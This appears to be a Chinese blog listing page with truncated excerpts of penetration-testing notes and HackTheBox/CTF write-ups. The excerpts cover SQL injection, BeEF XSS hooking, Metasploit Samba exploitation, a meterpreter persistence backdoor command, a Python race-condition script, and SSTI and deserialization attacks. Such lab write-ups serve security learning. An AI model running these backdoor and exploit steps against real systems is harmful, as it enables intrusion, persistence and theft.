855 1 分钟

# 1. 寻找 SQL 注入 通过综合漏扫工具可以找到可以注入的注入点,轻量级的可以使用 Xray 、 w3af , w3af 比较老了 15 年的,windows 版本需要 python2.5 环境,凑活用下也就算了。重量级的可以上 AWVS 这种,也能找出注入点 找到注入点之后 sqlmap 梭哈不解释。 # 2. 存储型跨站脚本攻击 在 kali 下运行 beef,进行 XSS 攻击,插入 hook.js 到留言板。当管理员查看留言板时将会劫持客户端浏览器,能够查看用户客户端中的 cookie 等,还能劫持跳转。 通过 Metasploit 中的 ms10_002 漏洞模块,针对 xp...
945 1 分钟

第三章基本上就是工具的使用,对我个人没有什么太大的意义 信息收集方面要看具体的项目是什么,针对不同的项目做具体的信息收集任务。 其中的 msf 联动 nessus 和 nmap 感觉没什么必要,主要依赖于 metasploit 的数据库,这种感觉不太妙,如果未来做漏扫服务器的话可能会考虑这么做,但是现在感觉没什么意义。如果是现在的话我会把需求拆解,分开进行,而不是仅仅通过 msf 一个终端进行。 记录一下需要用到的模块: msf > use auxiliary/scanner/http/dir_scanner msf > db_nmap -sS -Pn -A...
648 1 分钟

# 渗透测试 外围打点对我没有什么价值,直接无脑梭哈 后渗透有些参考 当植入 meterpreter 后需要植入后门 run persistence -X -i 5 -p 443 -r 127.0.0.1命令语法: A:自动启动Payload程序S:系统登录时自动加载U:用户登录时自动启动X:开机时自动加载i:回连的时间间隔P:攻击者监听反向连接端口号r:攻击者机器 IP 地址(攻击主机)留下后门后会重置当前 session 为后门会话 可以通过使用 exploit/multi/hadler 进行监听,从而重新获得会话。 撤离的时候需要执行一些清理操作,以免被查水表 #...
2.2k 2 分钟

# 1. 关于 Samba 服务的 usermap_script 安全漏洞相关信息 查看 usermap_script 模块的信息 msf6 > info exploit/multi/samba/usermap_script Name: Samba "username map script" Command Execution Module: exploit/multi/samba/usermap_script Platform: Unix Arch: cmd Privileged: Yes License: Metasploit Framework License...
6.3k 6 分钟

# 信息收集 源码 down 下来就开始审阅呗,全是 js。比较重要的就是 /route/index.js 和 database.js 以及 bot.js ​ /route/index.js const bot = require('../bot');const path = require('path');const express = require('express');const router = express.Router();const response = data => ({ message: data...
1.3k 1 分钟

# 信息收集 直接看源码了 ​ Js 中使用了 async 进行异步操作 ​ 那么用条件竞争 ​ # Payload # Python program to illustrate# the concept of race condition# in multiprocessingimport multiprocessingimport requestsimport timedef exploit(u, d, h): for i in range(5): requests.post(u, data=d, headers=h)def perform_transactions(cookie,...
1k 1 分钟

# 0x01 信息收集 index.php 调用 TimeControler ,然后传参 format 给 TimeModel ,接着进行 ```addslashes () 函数调用,然后调用 getTime () ,里面有一个 eval` 命令执行,这也就是漏洞所在! ​ TimeModel <?php class TimeModel{ public function __construct($format) { $this->format = addslashes($format); [ $d, $h, $m, $s ] = [...
665 1 分钟

# 0x01 信息收集 ​ 启动机器,访问目标 157.245.42.82:30461 搜索 Proudly powered by Flask/Jinja2 看看能得到什么信息 ​ 通过搜索可以知道这个 Flask 有一个 SSTI 服务端模板注入 ​ 类似于 XSS,就是通过输入特定的字符串构成模板的一部分,后端进行渲染的时候就会造成攻击 我们访问一下资源,验证下是不是存在 SSTI ​ 访问 # 访问http://157.245.42.82:30461/=9http://157.245.42.82:30461/=9发现都返回了错误,代表 SSTI 存在 那么我们可以通过 python...
1.6k 1 分钟

# 信息收集 查看源代码发现 cookie 是 page 通过序列化后 base64 加密生成生成的 <?phpspl_autoload_register(function ($name){ if (preg_match('/Model$/', $name)) { $name = "models/${name}"; } include_once "${name}.php";});if...
613 1 分钟

# 信息收集 根本不会啊我真是日了狗了,只好去查资料 ​ 一个韩国姐姐是真的牛逼 ​ 原文地址:https://domdom.tistory.com/entry/Hackthebox-Neonify-Writeup%EB%AC%B8%EC%A0%9C%ED%92%80%EC%9D%B4 ​ SSTI 的详细讲解:https://www.anquanke.com/post/id/188172 ​ 查看源码是 Ruby SSTI 14 行使用了正则表达式进行检查 ​ 在第 15 行,可以看到 neon 参数的值绑定到名为 ERB 的 Ruby 模板,并呈现为名为 index 的 html...